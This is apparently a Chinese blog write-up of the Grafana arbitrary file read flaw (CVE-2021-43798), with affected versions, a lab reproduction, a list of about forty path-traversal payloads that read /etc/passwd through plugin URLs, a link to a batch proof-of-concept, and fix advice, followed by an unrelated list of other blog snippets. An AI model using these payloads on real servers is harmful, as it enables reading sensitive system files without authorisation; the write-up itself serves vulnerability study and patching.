hana-u
hana-u

Grafana任意文件读取漏洞(CVE-2021-43798)

一、漏洞描述

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

二、漏洞影响范围

影响版本:
Grafana 8.0.0 - 8.3.0

安全版本:
Grafana 8.3.1, 8.2.7, 8.1.8, 8.0.7

三、vulfocus靶场复现

Grafana任意文件读取漏洞(CVE-2021-43798)_第1张图片
Grafana任意文件读取漏洞(CVE-2021-43798)_第2张图片
其他payload:

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

批量验证POC:https://github.com/culprits/Grafana_POC-CVE-2021-43798
Grafana任意文件读取漏洞(CVE-2021-43798)_第3张图片

四、修复建议

1.升级到最新版本
2.若无法及时更新,可设置Grafana仅对可信地址开放,即白名单访问;禁止系统对公网开放。

你可能感兴趣的:(安全,web安全)

  • 3月4日(信息差) Eqwaak00 信息差开发语言python学习科技
    雷军超钟睒睒登顶中国首富身家近4400亿元全球AI大混战升温!超越Sora的阿里万相大模型开源家用显卡都能跑✨小米15Ultra、小米SU7Ultra定档2月27日雷军宣布:向超高端进发1.超3.5万个网站遭入侵:恶意脚本将用户重定向至赌博平台2025年2月,网络安全领域发生了一起大规模入侵事件,超过3.5万个网站遭到攻击,攻击者在这些网站中植入了恶意脚本,完全劫持用户的浏览器窗口,并将其重定向至
  • JavaWeb——html表单与CSS anrui0 JavaWeb入门学习
    html表单介绍概念:用于采集用户输入的数据,用于和服务器交互。使用的标签:from。用于定义表单。可以定义一个范围,范围代表采集用户数据的范围。表单属性:1.action:指定提交数据的URL。2.method:指定提交的方式。method分类:一共7种,两种比较常用get:1.请求的参数会在地址栏中显示。2.请求参数的长度是有限制的。3.不太安全post1.请求的参数不会再地址栏中显示。2.请
  • 全方位解析双 Token实现无感刷新:用 Spring Boot + Vue + Redis 构建高安全认证体系 小菜不菜。 springbootvue.jsux
    前言:随着Web应用需求的增加,如何保障用户数据和信息的安全,成为了开发者关注的重要问题。传统的单Token认证方法虽然简便,但在长时间使用或高频请求下,可能带来一定的安全隐患。双Token身份认证机制提供了一种更加安全且高效的方式,本文将详细介绍如何在SpringBoot和Vue中实现双Token认证。同时在单token进行操作时,也会遇到token到期而需要频繁登录的问题,使用双token就能
  • 创建者——单例模式 每天减 1/5kg 单例模式
    单例模式单例模式的主要目的是确保一个类在当前系统中有且仅有一个实例能够被全局访问。特点唯一实例:一个类只有一个实例,且该实例一直存在。全局访问:通过静态方法提供全局唯一的访问入口,避免创建多个实例。简单示例1.懒汉式##非线程安全的单例实现classSingleton:_instance=Nonedef__new__(cls,*args,**kwargs):ifcls._instanceisNon
  • Office 2021 Mac Office办公 甜于酸 办公软件macos
    介绍Office2021包含:Word2021mac、Excel2021mac、PowerPoint2021mac、Outlook2021mac,OneNote2021mac等经典桌面应用程序,它还具有一些新功能和改进,例如模深色式支持、改进的可访问性支持、增强的安全性和性能优化、支持M1/M2/M3芯片、支持最新macOS系统。效果下载百度网盘:https://pan.baidu.com/s/1
  • TCP协议(20250304) 写代码的猫眼石 tcp/ip网络协议网络
    1.TCPTCP:传输控制协议(TransmissionControlProtocol),传输层协议之一(TCP,UDP)2.TCP与UDPUDP(用户数据报协议)面向数据报无连接不安全不可靠(尽最大努力交付)机制简单,传输效率高TCP(传输控制协议)需要建立连接安全、可靠面向字节流占用资源开销大3.三次握手指建立tcp连接时,需要客户端和服务端总共发送三次报文确认连接4.四次挥手断开一个tcp连
  • 2023年上海市浦东新区网络安全管理员决赛理论题样题 afei00123 网络安全&云安全考证狂魔web安全安全网络安全阿里云
    目录一、判断题二、单选题三、多选题一、判断题1.等保1.0至等保2.0从信息系统拓展为网络和信息系统。正确(1)保护对象改变等保1.0保护的对象是信息系统,等保2.0增加为网络和信息系统,增加了云计算、大数据、工业控制系统、物联网、移动物联技术、网络基础设施等保护对象,实现了全方面的覆盖。其实不管保护对象如何变化,都需对要求部分进行全面的安全测评。(2)分类结构统一等保2.0实现基本、设计、测评要
  • 从零构建企业IT安全策略:访问控制、数据保护与身份验证全流程实操指南 Aishenyanying33 网络安全架构安全性测试安全威胁分析web安全
    你是否担心企业IT系统的安全漏洞?如何从访问控制、数据保护到身份验证,全面构建一个安全可靠的IT环境?本文将手把手教你如何制定一套完整的企业IT安全策略,内容包含实操流程、技术工具推荐以及关键点分析,适合初学者和企业安全负责人。1.访问控制(1)用户分级管理实施RBAC(基于角色的访问控制):将用户角色分为访客、普通员工、管理员和高级管理员。每个角色设置最小权限原则,确保用户只能访问必要的资源。示
  • 如何判断系统是否使用 Log4j,并检测漏洞的存在? Aishenyanying33 log4j
    前言Log4j的漏洞(Log4Shell)是近年来网络安全领域非常严重的问题,它的影响范围极广。为了保护系统安全,我们需要判断自己的系统是否使用了Log4j,以及是否存在相关漏洞。本文将详细介绍如何检测Log4j的使用,并通过输入测试字符串的方式来判断漏洞是否存在。1.如何判断系统是否使用了Log4j?方法1:检查系统代码或依赖查看代码库:在代码中搜索是否引用了Log4j,特别是类似org.apa
  • 网络安全的八大机制 黑客-秋凌 web安全安全
    文章目录第一章网络安全概述与环境配置第二章网络安全协议基础第四章网络扫描与网络监听第五章网络入侵第六章网络后门与网络隐身第八章操作系统安全基础第九章密码学与信息加密第十章防火墙与入侵检测第十一章IP安全和WEB安全第一章网络安全概述与环境配置1.狭义上,也就是通常说的信息安全,只是从自然科学的角度介绍信息安全。广义上,信息安全涉及多方面的理论和应用知识,除了数学、通信、计算机等自然科学外,还涉及法
  • 网络安全与认知安全的区别 网络和安全的关系 黑客-秋凌 网络web安全安全
    前言说说信息安全与网络安全的关系一、包含和被包含的关系信息安全包括网络安全,信息安全还包括操作系统安全,数据库安全,硬件设备和设施安全,物理安全,人员安全,软件开发,应用安全等。二、针对的设备不同网络安全侧重于研究网络环境下的计算机安全,信息安全侧重于计算机数据和信息的安全。三、侧重点不同网络安全更注重在网络层面,例如通过部署防火墙、入侵检测等硬件设备来实现链路层面的安全防护,而信息安全的层面要比
  • 《网络风险及网络安全》培训总结 黑客-秋凌 网络web安全php
    2024年7月3日我有幸参加了中国保险协会组织的《网络风险及网络安全》培训班,对公司和部门领导给与的本次培训机会,我非常珍惜,始终以培训要求的标准对照自己,严格要求自己,积极参加培训学习及课间讨论活动,虽然学习的时间非常有限,但这次培训活动给我的收获是无限的。一、培训课程内容简介:首先介绍一下本次培训的三天课程内容:DAY1:1、金融服务中的网络风险识别:网络风险定义,这些年发生的网络风险事件,金
  • 机场网络安全安全运营体系 黑客Jack 安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快随之经济发展的逐步推进,老百姓衣食住行水准明显提升,乘座飞机场交通出行的总数逐渐渐长,飞机场人口总数的提高对安全性要求也慢慢提升。与人流量、飞机场基本建设的不断持续增长相符合,飞机场对高经营管理效益、高安全保卫要求日渐提升。另外,国际上连续不断的不法主题活动也促使群众针对公共性自然环境的安全保卫需求不断提高。飞机场做为人流量集中场所和货运
  • java开发之框架基础技术反射 CT随 java开发语言
    什么是反射:在Java开发中,反射是一种强大的技术,允许程序在运行时检查和修改类、方法、字段等结构。它允许程序在没有预先知识的情况下,动态地加载类、创建对象、调用方法以及访问或修改字段。这种能力使得Java程序能够更加灵活和动态,但同时也需要谨慎使用,因为它可能会牺牲一些编译时的类型安全性Java反射常用API有哪些在Java中,反射是由JavaReflectionAPI支持的,它提供了一组类和接
  • PCB 在自动驾驶设备中的多元化应用 华高电路 自动驾驶人工智能机器学习大数据pcb工艺制造ai
    在自动驾驶技术飞速发展的当下,PCB作为关键的基础部件,深度融入自动驾驶设备的各个系统,为车辆的安全、智能运行提供了有力支撑一、传感器系统作为核心枢纽(一)视觉感知摄像头适配:自动驾驶汽车凭借多个不同视角的摄像头,实现360度环境感知;PCB在摄像头模组里扮演“幕后英雄”,以常见的CMOS图像传感器为例,它需与PCB紧密相连,借助PCB上精细布线,将捕捉到的图像数据高速传输至车载计算单元;同时,P
  • 【版本控制安全简报】Perforce Helix Core安全更新:漏洞修复与国内用户支持 版本控制gitsvn
    本文内容来源perforce.com,由Perforce中国授权合作伙伴-龙智编辑整理。Perforce致力于为其产品和客户维持最高标准的安全性。近期,得益于一位独立安全研究人员的宝贵意见,Perforce进一步增强了HelixCore的安全性。此次发现进一步巩固了Perforce安全协议,并提供了用于改进测试和发布实践的见解。潜在影响一位独立安全研究人员发现了可能导致版本控制系统无法操作,直到管
  • 主流数字证书有哪些? ssl证书ssl数字证书
    在数字化浪潮中,数字证书作为保障网络通信安全的核心技术,已成为构建可信数字生态的“基石”。从电子商务到金融交易,从电子政务到物联网,数字证书的应用场景不断拓展,其技术形态也在持续演进。本文将深入解析主流数字证书的类型、应用场景及未来发展趋势,为读者提供全面的技术视角与行业洞察。一、主流数字证书的类型与特点SSL/TLS证书功能:用于加密网站通信,确保数据在传输过程中的机密性与完整性。类型:域名验证
  • DevSecOps自动化在安全关键型软件开发中的实践、Helix QAC& Klocwork等SAST工具应用
    DevSecOps自动化对于安全关键型软件开发至关重要。那么,什么是DevSecOps自动化?具有哪些优势?为何助力安全关键型软件开发?让我们一起来深入了解~什么是DevSecOps自动化?DevSecOps自动化是指在软件开发生命周期的各个阶段构建安全流程,并使用自动化工具和最佳实践来简化开发、安全和运营。DevSecOps是一种流行的软件开发实践,用于实现自动化、缩短反馈时间,并确保软件开发的
  • 本地部署Dify及避坑指南 挣扎与觉醒中的技术人 docker容器dify语言模型人工智能
    Dify作为开源的大模型应用开发平台,支持本地私有化部署,既能保障数据安全,又能实现灵活定制。但对于新手而言,从环境配置到服务启动可能面临诸多挑战。本文结合实战经验,手把手教你从零部署Dify,并总结高频踩坑点,助你快速上手!一、环境准备:系统与工具的黄金组合系统要求操作系统:优先选择Ubuntu22.04+或WSL(Windows子系统),避免直接使用Windows因路径权限问题导致容器启动失败
  • ES系列-- ILM索引生命周期管理 一般般玩 ELK
    前言官方文档地址7.8版本正文ILM定义了四个生命周期阶段:Hot:正在积极地更新和查询索引。Warm:不再更新索引,但仍在查询。cold:不再更新索引,很少查询。信息仍然需要可搜索,但是如果这些查询速度较慢也可以。Delete:不再需要该索引,可以安全地将其删除。ILM定期运行(indices.lifecycle.poll_interval),默认是10分钟,检查索引是否符合策略标准,并执行所需
  • 【商城实战(2)】商城架构设计:从底层逻辑到技术实现 奔跑吧邓邓子 商城实战商城实战架构设计
    【商城实战】专栏重磅来袭!这是一份专为开发者与电商从业者打造的超详细指南。从项目基础搭建,运用uniapp、ElementPlus、SpringBoot搭建商城框架,到用户、商品、订单等核心模块开发,再到性能优化、安全加固、多端适配,乃至运营推广策略,102章内容层层递进。无论是想深入钻研技术细节,还是探寻商城运营之道,本专栏都能提供从0到1的系统讲解,助力你打造独具竞争力的电商平台,开启电商实战
  • 【商城实战(1)】启航:从0到1搭建电商帝国的第一步 奔跑吧邓邓子 商城实战商城实战项目背景选型
    【商城实战】专栏重磅来袭!这是一份专为开发者与电商从业者打造的超详细指南。从项目基础搭建,运用uniapp、ElementPlus、SpringBoot搭建商城框架,到用户、商品、订单等核心模块开发,再到性能优化、安全加固、多端适配,乃至运营推广策略,102章内容层层递进。无论是想深入钻研技术细节,还是探寻商城运营之道,本专栏都能提供从0到1的系统讲解,助力你打造独具竞争力的电商平台,开启电商实战
  • 《2025软件测试工程师面试》功能测试篇 悠然的笔记本 功能测试面试
    什么是功能测试?功能测试是通过验证产品功能是否满足用户需求的过程,主要关注软件的功能是否符合需求规格说明,包括软件的各种功能、特性、性能、安全性和易用性等。功能测试的流程包括哪些步骤?需求分析:明确软件需求,确定测试范围。测试计划:制定详细的测试计划,包括测试目标、测试策略、测试资源等。测试用例设计:根据需求和测试计划,设计测试用例。、测试执行:按照测试用例执行测试,记录测试结果。缺陷跟踪:发现缺
  • The missing semester of your CS education--命令行环境 磷光 计算机前置课程学习笔记unixgitlinux
    课程结构01.课程概览与shell02.Shell工具和脚本03.编辑器(Vim)04.数据整理05.命令行环境06.版本控制(Git)07.调试及性能分析08.元编程09.安全和密码学10.大杂烩11.提问&回答本文档修改自这里,补充了一些视频中展示但配套文档中未提供的代码,以及一些注释。命令行环境--目录命令行环境任务控制结束进程暂停和后台执行进程终端多路复用tmux快捷键tmux配置扩展阅读
  • java开发预防XSS攻击 Xia0Mo Java知识点javaxss开发语言
    好的!以下是一篇关于“Java开发者如何预防XSS攻击”的博文草稿,您可以根据需要进行调整和优化。如果您有任何问题,可以随时问我,我会根据您的需求进一步修改或补充内容。Java开发者如何有效预防XSS攻击在Web应用开发中,安全性是至关重要的。XSS(跨站脚本攻击)作为最常见的Web安全漏洞之一,威胁着用户数据的安全。作为一名Java开发者,了解并预防XSS攻击是必备技能。本文将详细介绍XSS攻击
  • 【网络安全】Slowloris DDos攻击详解(附工具说明) 秋说 web安全ddos
    未经许可,不得转载。本文仅供学习交流使用,不得进行非法渗透测试,笔者不承担任何责任。文章目录SlowlorisDDos攻击Slowloris攻击过程工具下载使用教程下载使用语法说明使用案例如何缓解Slowloris攻击?SlowlorisDDos攻击是低速缓慢DDos攻击的一种。推荐阅读:【网络安全】低速缓慢DDos攻击详解SlowlorisDDos攻击Slowloris是一种应用程序层攻击,使攻
  • 【软件测试】论坛系统功能测试报告 念来过倒字名qwq 功能测试
    文章目录1.前言2.项目介绍3.对项目进行测试3.1设计测试用例3.2执行测试用例1.前言这次测试是我学习阶段的练习,由于缺少需求规格说明等文档,需要我尽可能发散思维去设计更多的测试用例。但无论如何测试至关重要,以下是核心原因:保障核心功能的可用性。防止用户体验差。防止用户流失。规避安全风险。降低维护成本。本次测试的范围仅覆盖功能、UI界面、兼容性、易用性、安全性、性能六个方面。2.项目介绍这是一
  • 随机树算法 自动驾驶汽车的路径规划 静态障碍物(Matlab) Luis Li 的猫猫 自动驾驶汽车人工智能算法计算机视觉
    随着自动驾驶技术的蓬勃发展,安全、高效的路径规划成为核心挑战之一。快速探索随机树(RRT)算法作为一种强大的路径搜索策略,为自动驾驶汽车在复杂环境下绕过静态障碍物规划合理路径提供了有效解决方案。RRT算法基于随机采样思想构建树形结构。从初始状态点出发,在车辆的状态空间内反复随机采样,将新采样点与已有树中的节点依据距离、可达性等规则进行连接拓展,逐步生长形成一棵能够覆盖状态空间大部分区域的树,向着目
  • < 鸿蒙生态学堂 线上培训 第12期 > 应用安全与隐私优化常见实践案例 harmonyos
    课程简介本课程是【HarmonyOS生态学堂线上培训】的第12期。应用安全和隐私保护是赢得用户信任的基础,据统计超过80%的数据泄露源自代码层面的安全疏忽,而每一次数据泄露事件平均给企业带来的损失高达数百万美元。这些问题不仅会降低用户对应用的信任,还可能导致严重的法律后果和经济损失。本课程针对以上痛点,主要介绍隐私与安全相关概念以及分享实践案例,让应用安全隐私问题无处遁形!标签鸿蒙课程鸿蒙生态布道
  • HarmonyNext实战案例:基于ArkTS的跨设备文件共享应用开发 前端
    引言在HarmonyNext生态系统中,跨设备协同是一个核心特性。本文将详细讲解如何使用ArkTS开发一个跨设备文件共享应用,该应用允许用户在多个HarmonyOS设备之间无缝传输文件。我们将从需求分析、架构设计、代码实现到测试部署,一步步带你完成整个开发过程。需求分析我们的目标是开发一个跨设备文件共享应用,主要功能包括:设备发现与连接:应用能够自动发现附近的HarmonyOS设备,并建立安全连接
  • html 周华华 html
    js 1,数组的排列 var arr=[1,4,234,43,52,]; for(var x=0;x<arr.length;x++){    for(var y=x-1;y<arr.length;y++){      if(arr[x]<arr[y]){     &
  • 【Struts2 四】Struts2拦截器 bit1129 struts2拦截器
    Struts2框架是基于拦截器实现的,可以对某个Action进行拦截,然后某些逻辑处理,拦截器相当于AOP里面的环绕通知,即在Action方法的执行之前和之后根据需要添加相应的逻辑。事实上,即使struts.xml没有任何关于拦截器的配置,Struts2也会为我们添加一组默认的拦截器,最常见的是,请求参数自动绑定到Action对应的字段上。   Struts2中自定义拦截器的步骤是:
  • make:cc 命令未找到解决方法 daizj linux命令未知make cc
    安装rz sz程序时,报下面错误:   [root@slave2 src]# make posix cc   -O -DPOSIX -DMD=2 rz.c -o rz make: cc:命令未找到 make: *** [posix] 错误 127   系统:centos 6.6 环境:虚拟机   错误原因:系统未安装gcc,这个是由于在安
  • Oracle之Job应用 周凡杨 oracle job
    最近写服务,服务上线后,需要写一个定时执行的SQL脚本,清理并更新数据库表里的数据,应用到了Oracle 的 Job的相关知识。在此总结一下。   一:查看相关job信息    1、相关视图  dba_jobs  all_jobs  user_jobs  dba_jobs_running 包含正在运行
  • 多线程机制 朱辉辉33 多线程
    转至http://blog.csdn.net/lj70024/archive/2010/04/06/5455790.aspx 程序、进程和线程: 程序是一段静态的代码,它是应用程序执行的蓝本。进程是程序的一次动态执行过程,它对应了从代码加载、执行至执行完毕的一个完整过程,这个过程也是进程本身从产生、发展至消亡的过程。线程是比进程更小的单位,一个进程执行过程中可以产生多个线程,每个线程有自身的
  • web报表工具FineReport使用中遇到的常见报错及解决办法(一) 老A不折腾 web报表finereportjava报表报表工具
    FineReport使用中遇到的常见报错及解决办法(一) 这里写点抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。   出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。   1、address pool is full: 含义:地址池满,连接数超过并发数上
  • mysql rpm安装后没有my.cnf 林鹤霄 没有my.cnf
    Linux下用rpm包安装的MySQL是不会安装/etc/my.cnf文件的, 至于为什么没有这个文件而MySQL却也能正常启动和作用,在这儿有两个说法, 第一种说法,my.cnf只是MySQL启动时的一个参数文件,可以没有它,这时MySQL会用内置的默认参数启动, 第二种说法,MySQL在启动时自动使用/usr/share/mysql目录下的my-medium.cnf文件,这种说法仅限于r
  • Kindle Fire HDX root并安装谷歌服务框架之后仍无法登陆谷歌账号的问题 aigo root
    原文:http://kindlefireforkid.com/how-to-setup-a-google-account-on-amazon-fire-tablet/   Step 4: Run ADB command from your PC   On the PC, you need install Amazon Fire ADB driver and instal
  • javascript 中var提升的典型实例 alxw4616 JavaScript
    // 刚刚在书上看到的一个小问题,很有意思.大家一起思考下吧 myname = 'global'; var fn = function () { console.log(myname); // undefined var myname = 'local'; console.log(myname); // local }; fn() // 上述代码实际上等同于以下代码 m
  • 定时器和获取时间的使用 百合不是茶 时间的转换定时器
    定时器:定时创建任务在游戏设计的时候用的比较多   Timer();定时器 TImerTask();Timer的子类  由 Timer 安排为一次执行或重复执行的任务。       定时器类Timer在java.util包中。使用时,先实例化,然后使用实例的schedule(TimerTask task, long delay)方法,设定
  • JDK1.5 Queue bijian1013 javathreadjava多线程Queue
    JDK1.5 Queue LinkedList: LinkedList不是同步的。如果多个线程同时访问列表,而其中至少一个线程从结构上修改了该列表,则它必须 保持外部同步。(结构修改指添加或删除一个或多个元素的任何操作;仅设置元素的值不是结构修改。)这一般通过对自然封装该列表的对象进行同步操作来完成。如果不存在这样的对象,则应该使用 Collections.synchronizedList 方
  • http认证原理和https bijian1013 httphttps
    一.基础介绍         在URL前加https://前缀表明是用SSL加密的。 你的电脑与服务器之间收发的信息传输将更加安全。         Web服务器启用SSL需要获得一个服务器证书并将该证书与要使用SSL的服务器绑定。 http和https使用的是完全不同的连接方式,用的端口也不一样,前者是80,后
  • 【Java范型五】范型继承 bit1129 java
    定义如下一个抽象的范型类,其中定义了两个范型参数,T1,T2   package com.tom.lang.generics; public abstract class SuperGenerics<T1, T2> { private T1 t1; private T2 t2; public abstract void doIt(T
  • 【Nginx六】nginx.conf常用指令(Directive) bit1129 Directive
    1. worker_processes    8; 表示Nginx将启动8个工作者进程,通过ps -ef|grep nginx,会发现有8个Nginx Worker Process在运行   nobody 53879 118449 0 Apr22 ? 00:26:15 nginx: worker process
  • lua 遍历Header头部 ronin47 lua header 遍历 
    local headers = ngx.req.get_headers()   ngx.say("headers begin", "<br/>")   ngx.say("Host : ", he
  • java-32.通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小(两数组的差最小)。 bylijinnan java
    import java.util.Arrays; public class MinSumASumB { /** * Q32.有两个序列a,b,大小都为n,序列元素的值任意整数,无序. * * 要求:通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小。 * 例如: * int[] a = {100,99,98,1,2,3
  • redis 开窍的石头 redis
    在redis的redis.conf配置文件中找到# requirepass foobared 把它替换成requirepass 12356789 后边的12356789就是你的密码 打开redis客户端输入config get requirepass 返回 redis 127.0.0.1:6379> config get requirepass 1) "require
  • [JAVA图像与图形]现有的GPU架构支持JAVA语言吗? comsci java语言
          无论是opengl还是cuda,都是建立在C语言体系架构基础上的,在未来,图像图形处理业务快速发展,相关领域市场不断扩大的情况下,我们JAVA语言系统怎么从这么庞大,且还在不断扩大的市场上分到一块蛋糕,是值得每个JAVAER认真思考和行动的事情       
  • 安装ubuntu14.04登录后花屏了怎么办 cuiyadll ubuntu
    这个情况,一般属于显卡驱动问题。 可以先尝试安装显卡的官方闭源驱动。 按键盘三个键:CTRL + ALT  +  F1 进入终端,输入用户名和密码登录终端: 安装amd的显卡驱动 sudo  apt-get  install  fglrx 安装nvidia显卡驱动 sudo  ap
  • SSL 与 数字证书 的基本概念和工作原理 darrenzhu 加密ssl证书密钥签名
    SSL 与 数字证书 的基本概念和工作原理 http://www.linuxde.net/2012/03/8301.html SSL握手协议的目的是或最终结果是让客户端和服务器拥有一个共同的密钥,握手协议本身是基于非对称加密机制的,之后就使用共同的密钥基于对称加密机制进行信息交换。 http://www.ibm.com/developerworks/cn/webspher
  • Ubuntu设置ip的步骤 dcj3sjt126com ubuntu
    在单位的一台机器完全装了Ubuntu Server,但回家只能在XP上VM一个,装的时候网卡是DHCP的,用ifconfig查了一下ip是192.168.92.128,可以ping通。 转载不是错: Ubuntu命令行修改网络配置方法 /etc/network/interfaces打开后里面可设置DHCP或手动设置静态ip。前面auto eth0,让网卡开机自动挂载. 1. 以D
  • php包管理工具推荐 dcj3sjt126com PHPComposer
    http://www.phpcomposer.com/   Composer是 PHP 用来管理依赖(dependency)关系的工具。你可以在自己的项目中声明所依赖的外部工具库(libraries),Composer 会帮你安装这些依赖的库文件。 中文文档  入门指南  下载  安装包列表 Composer 中国镜像
  • Gson使用四(TypeAdapter) eksliang jsongsonGson自定义转换器gsonTypeAdapter
    转载请出自出处:http://eksliang.iteye.com/blog/2175595 一.概述        Gson的TypeAapter可以理解成自定义序列化和返序列化 二、应用场景举例        例如我们通常去注册时(那些外国网站),会让我们输入firstName,lastName,但是转到我们都
  • JQM控件之Navbar和Tabs gundumw100 htmlxmlcss
    在JQM中使用导航栏Navbar是简单的。 只需要将data-role="navbar"赋给div即可: <div data-role="navbar"> <ul> <li><a href="#" class="ui-btn-active&qu
  • 利用归并排序算法对大文件进行排序 iwindyforest java归并排序大文件分治法Merge sort
      归并排序算法介绍,请参照Wikipeida zh.wikipedia.org/wiki/%E5%BD%92%E5%B9%B6%E6%8E%92%E5%BA%8F 基本思想: 大文件分割成行数相等的两个子文件,递归(归并排序)两个子文件,直到递归到分割成的子文件低于限制行数 低于限制行数的子文件直接排序 两个排序好的子文件归并到父文件 直到最后所有排序好的父文件归并到输入
  • iOS UIWebView URL拦截 啸笑天 UIWebView
    本文译者:candeladiao,原文:URL filtering for UIWebView on the iPhone说明:译者在做app开发时,因为页面的javascript文件比较大导致加载速度很慢,所以想把javascript文件打包在app里,当UIWebView需要加载该脚本时就从app本地读取,但UIWebView并不支持加载本地资源。最后从下文中找到了解决方法,第一次翻译,难免有
  • 索引的碎片整理SQL语句 macroli sql
    SET NOCOUNT ON DECLARE @tablename VARCHAR (128) DECLARE @execstr VARCHAR (255) DECLARE @objectid INT DECLARE @indexid INT DECLARE @frag DECIMAL DECLARE @maxfrag DECIMAL --设置最大允许的碎片数量,超过则对索引进行碎片
  • Angularjs同步操作http请求with $promise qiaolevip 每天进步一点点学习永无止境AngularJS纵观千象
    // Define a factory app.factory('profilePromise', ['$q', 'AccountService', function($q, AccountService) { var deferred = $q.defer(); AccountService.getProfile().then(function(res) {
  • hibernate联合查询问题 sxj19881213 sqlHibernateHQL联合查询
    最近在用hibernate做项目,遇到了联合查询的问题,以及联合查询中的N+1问题。 针对无外键关联的联合查询,我做了HQL和SQL的实验,希望能帮助到大家。(我使用的版本是hibernate3.3.2)   1 几个常识:  (1)hql中的几种join查询,只有在外键关联、并且作了相应配置时才能使用。  (2)hql的默认查询策略,在进行联合查询时,会产
  • struts2.xml wuai struts
    <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他